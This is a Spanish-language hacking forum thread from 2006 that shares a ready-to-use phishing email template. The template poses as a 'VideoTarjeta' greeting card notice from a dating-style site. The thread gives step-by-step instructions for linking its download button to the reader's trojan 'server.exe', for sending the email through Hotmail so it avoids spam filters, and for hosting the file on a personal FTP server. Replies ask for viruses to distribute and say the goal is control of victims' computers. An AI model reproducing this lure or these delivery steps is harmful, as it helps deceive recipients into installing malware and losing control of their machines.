elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:44  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Abril Negro Fake by hIgOcHuMbO
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro Fake by hIgOcHuMbO  (Leído 3,758 veces)
hIgOcHuMbO


Desconectado Desconectado

Mensajes: 538



Ver Perfil
Abril Negro Fake by hIgOcHuMbO
« en: 2 Abril 2006, 00:49 »

No es un fake como quien dice porque no imita nada conocido. Es una simple invitacion que podeis mandar al correo incitando al que se lo envieis a descargarse una VideoTarjeta. Parece tonteria pero funciona.

Para ver el contenido copiar y pegar este codigo en un archivo de texto y guardarlo con extension .htm. Para enviar por mail a alguien copiar y pegar el codigo en la caja de texto donde se escribe el mail. Para que al pinchar en "descargar ahora" la victima se baje vuestro troyano copiar y pegar este codigo en un archivo de texto pulsar contrl+b y en la ventanita que os sale escribir "a href" sin las comillas y cuando el buscador os encuentre esos digitos vereis en el texto esto <a href="">, bien pues entre las comillas que hay despues del igual debeis poner la ruta completa al server que habeis subido a algun sitio por ejemplo asi "http://www.web.com/server.exe"

Saludos.


<html>
<body>
<table width="767"cellpadding="0"cellspacing="0">
 <tr>
  <td height="20"background="http://img369.imageshack.us/img369/9829/barrarosa1eq.jpg"></td>
 </tr>
 <tr>
  <td>
   <table bgcolor="feb3b3"cellpadding="0"cellspacing"1">
    <tr>
     <td bgcolor="fdd2d2"width="250"height="328"><img src="http://img371.imageshack.us/img371/1491/442zf.jpg"></td>
     <td width="100%"bgcolor="fdd2d2">
      <table width="100%"height="328"cellspacing="0"cellpadding="0">
       <tr><td bgcolor="fdd2d2"height="40"><center><img src="http://img371.imageshack.us/img371/8603/vt0bg.jpg"></center></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font face="arial black"color="ff8081"size="2">Alguien que te quiere conocer te ha enviado una VideoTarjeta. También te ha enviado un mensaje que podrás ver en tu perfil.</font><br><br><br><br><a href=""><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a></font><br><br><br><hr color="ffffff"><font face="arial black"color="ff8081"size="1">Este sistema de VideoTarjetas caduca a las 24 horas de recibir este e-mail debido al excesivo uso de este servicio por lo que si pasadas las 24 horas la VideoTarjeta no ha sido descargada ésta será eliminada.</font></center></td></tr>
       <tr><td bgcolor="fdd2d2"height="40"><center><font size="2">Para poder visualizar la videotarjeta es necesario tener instalado Macromedia Flash en tu ordenador. Si aún no lo tienes <a href="http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">Pulsa Aquí</a></font></center></td></tr>
      </table>
     </td>
    </tr>
   </table>
  </td>
 </tr>
 <tr>
  <td height="20"background="http://img371.imageshack.us/img371/7858/barrarosa2qk.jpg"></td>
 </tr>
 <tr><td bgcolor="ffd8d8"><center><font face="arial black"color="ff8081"size="3">Últimos usuarios registrados</font></center><br></td></tr>
 <tr>
  <td bgcolor="ffd8d8"><center>
   <table cellpadding="0"cellspacing="2">
    <tr><td colspan="3"height="20"><center><img src="http://img390.imageshack.us/img390/2410/chicos4cp.jpg"></center></td><td rowspan="3"width="10"></td><td colspan="3"><center><img src="http://img390.imageshack.us/img390/7488/chicas6mq.jpg"></center></td></tr>
    <tr><td colspan="3"height="5"></td><td colspan="3"></td></tr>
    <tr>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/705/f17fo.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Hector3<br>Valencia<br>27 años</b></font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/3709/f21ub.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Chache<br>Madrid<br>21 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/3140/f31cs.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>the_best<br>Barcelona<br>23 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/8694/f44ac.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Xina<br>BCN<br>17 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/6572/f56bb.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Radicalera<br>Toledo<br>19 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/4247/f65us.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>I_Love_U<br>Moscú<br>21 años</font></center></td></tr>
      </table></center>
     </td>
    </tr>
   </table>
  </td>
 </tr>
 <tr>
  <td height="20"background="http://img371.imageshack.us/img371/7858/barrarosa2qk.jpg"></td>
 </tr>
</table>
</body>
</html>
« Última modificación: 2 Abril 2006, 01:02 por hIgOcHuMbO » En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #1 en: 2 Abril 2006, 01:01 »

Supongo que en la URL pondras la ruta de un archivo exe o comprimido en zip con un troyano o algo.... podrias explicar para los que no tiene mucha idea y donde tenen que poner el link....
La tarjeta quedaria asi:



Salu2
En línea

hIgOcHuMbO


Desconectado Desconectado

Mensajes: 538



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #2 en: 2 Abril 2006, 01:05 »

Tal que me respondias estaba escribiendo una breve explicacion :P

Si alguien no entiende que no se corte en preguntar. Vengo bastante cansado de trabajar hoy y por eso fui demasiado al grano :)

Saludos.
En línea

CARRY-ON

Desconectado Desconectado

Mensajes: 199



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #3 en: 3 Abril 2006, 21:53 »

SABES de alguna web donde bajar un virus para luego subirlo a mi web y subir ese virus?
En línea
RED_HORSE

Desconectado Desconectado

Mensajes: 95



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #4 en: 3 Abril 2006, 22:15 »

 por que no haces un manual mas espesifico con imagenes y demas cosas

  PD: a eso se lo lla xploit ;D ;D ;D ;D ;D
En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #5 en: 4 Abril 2006, 00:37 »

PD: a eso se lo lla xploit ;D ;D ;D ;D ;D

Eso es un simple engaño (Ingenieria Social)

Esto son exploits, por favor, me gustaria que colaboraran.
http://foro.elhacker.net/index.php/topic,116060.0.html

Salu2
En línea

RED_HORSE

Desconectado Desconectado

Mensajes: 95



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #6 en: 4 Abril 2006, 00:50 »

  jajaja  yo dije Xploit no exploit  ;D ;D ;D ;D ;D
En línea

Meg


Desconectado Desconectado

Mensajes: 458



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #7 en: 4 Abril 2006, 15:43 »

Pues si esta idea esta muy bien no se html. tengo un servidor ftp y un troyano en visual basic ya terminado me podriais decir donde tengo k poner la Url de mi ftp en ese codigo html pa k la gente se lo baje ?
gracias
En línea
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #8 en: 4 Abril 2006, 15:47 »

<a href="aki_tu_url"><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a>
En línea

hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #9 en: 4 Abril 2006, 16:12 »

mmm se ve bueno, la idea, pero mucha  ;), yo e usado xploit, pero con targetas gusanito, y me funciono muy vien, veremos este como funciona,  ;D
En línea


BloCKeadO


Desconectado Desconectado

Mensajes: 2.250


Made in Spain.


Ver Perfil WWW
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #10 en: 4 Abril 2006, 16:20 »

Yo este no lo uso, pero imagino que es mas creible y no esta tan explotado que las tarjetas de gusanito, nico, & Cia. aun asi se trata de un engaño similar, solo que si la victima acepta no se consigue una cuenta de hotmail que poco uso le podemos dar, sino que tendremos control sobre un pc.
En línea

hIgOcHuMbO


Desconectado Desconectado

Mensajes: 538



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #11 en: 4 Abril 2006, 16:26 »

Perdonar por no haberlo explicado bien pero ando algo ocupado con otras cosas :P

No se llama exploit ni xploit ni fake. Es lo que dicen, un simple engaño. Los nombres que he citado antes son nombres con los uqe la gente llama a estas cosas ( yo lo llamo fake y no quiere decir que lo sea :P )

Weno el tema es que ese codigo tiene un enlace que no lleva a ningun sitio y en ese enlace vosotros debeis poner la ruta al server que hayais subido a algun sitio ( no voy a explicar como subir cosas a ningun stio ya que no tiene nada que ver con esto y ademas tampoco tiene ninguna dificultad aunque para ayudaros un poquito... miarroba permite subir exes )

Para encontrar el enlace en el codigo copiar el codigo html en un archivo de texto, pulsar las teclas control+b y en la ventana que os sale escribir esto a href="" y pulsar intro. Vereis que ahora en el archivo de texto sale subrayado justamente ese texto que estais buscando. Pues entre las comillas debeis escribir el url del server que hayais subido a donde fuera ejemplo http://tuweb.webcindario.com/server.exe y si ese fuera el link el enlace dentro del codigo quedaria tal que asi:

<a href="http://tuweb.webcindario.com/server.exe"><img...

Con eso ya teneis el link a vuestro server disponible para descargarlo en cuanto la victima pinche en descargar Videoarjeta. Podeis dejarlo con la extension txt ya que lo que vais a enviar por mail es el texto y no el archivo. Para los que tengais uns ervidor ftp en vuestro pc guardar el archivo como fake.htm ( o con algun nombre menos sospechoso xd ) y mas abajo os explico como hacer para que la victima lo visite como si se tratara de una web.

Ahora, para enviar por mail iros a hotmail o cualquiera que sea vuestro servidor de e-mail y darle a nuevo mail. Cuando os salga la pagina en la que teneis que poner a quien se lo mandais escribis la direccion de quien quereis que reciba la supuesta videotarjeta, escribis despues el asunto y donde escribis el mensaje no pongais nada, solo debeis poner el codigo con el enalce a vuestro troyano en ese sitio tal que asi:



Bueno ahora solo os queda mandaroslo a vosotros mismos para ver como lo vera quien lo reciba. Si enviais esto con un mailer lo mas seguro es que llegue al correo no deseado y a parte de que la victima no lo va a ver aunque puede darse el caso no vera las imagenes ya que en el correo no deseado estas son bloqueadas. Si el mail lo enviais desde hotmail va a llegar a la bandeja de entrada de casi todos los servidores de correo por no decir que a todos.

Lo ultimo para los que teneis uns ervidor ftp en vuestro pc. Si quereis que la victima visite vuestro servidor ftp para ver el "fake" el link seria tal que asi:

http://ftp://tuIP/ruta/en/la/que/esta/el/fake.htm

Creo que asi ya funcionaria ( si ese link lo pone en el mozilla o en el internet explorer funciona ) pero por si las moscas tambien podeis ponerlo asi:

http://ftp://tuIP:21/ruta/en/la/que/esta/el/fake.htm

BUeno creo que esta todo. Si teneis mas dudas preguntar y os explico.

Saludos
« Última modificación: 4 Abril 2006, 16:29 por hIgOcHuMbO » En línea

Gorky


Desconectado Desconectado

Mensajes: 766



Ver Perfil WWW
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #12 en: 4 Abril 2006, 16:46 »

Lo ultimo para los que teneis uns ervidor ftp en vuestro pc. Si quereis que la victima visite vuestro servidor ftp para ver el "fake" el link seria tal que asi:

http://ftp://tuIP/ruta/en/la/que/esta/el/fake.htm

Creo que asi ya funcionaria ( si ese link lo pone en el mozilla o en el internet explorer funciona ) pero por si las moscas tambien podeis ponerlo asi:

http://ftp://tuIP:21/ruta/en/la/que/esta/el/fake.htm


Esto es muy posible que no os funcione asi tal cual. Tan solo serviria si teneis configurada la cuenta de usuario anonymous en vuestro servidor. Para que el resultado sea optimo teneis que crear un usuario nuevo, preferiblemente solo con permisos de READ, y con una contraseña. Entonces la direccion del archivo quedaria asi:

http://ftp://usuario:contraseña@tuIP:21/ruta/fake.html
En línea

Si te gusta la Formula 1...
Meg


Desconectado Desconectado

Mensajes: 458



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #13 en: 4 Abril 2006, 16:52 »

gracias pero no se por k no me funciona cambio la linea  <tr><td bgcolor="fdd2d2"height="40"><center><img src="http://img371.imageshack.us/img371/8603/vt0bg.jpg"></center></td></tr> por esto :

<a href="Mi FTP"><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a>

y es como si no pasase nada
En línea
hIgOcHuMbO


Desconectado Desconectado

Mensajes: 538



Ver Perfil
Re: Abril Negro Fake by hIgOcHuMbO
« Respuesta #14 en: 4 Abril 2006, 16:59 »

Esque no tienes que cambiar toda la linea... Dije que pusieras entre las comillas el link a tu server. No tienes que sustituir nada, solo añadir el link entre las comillas.
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines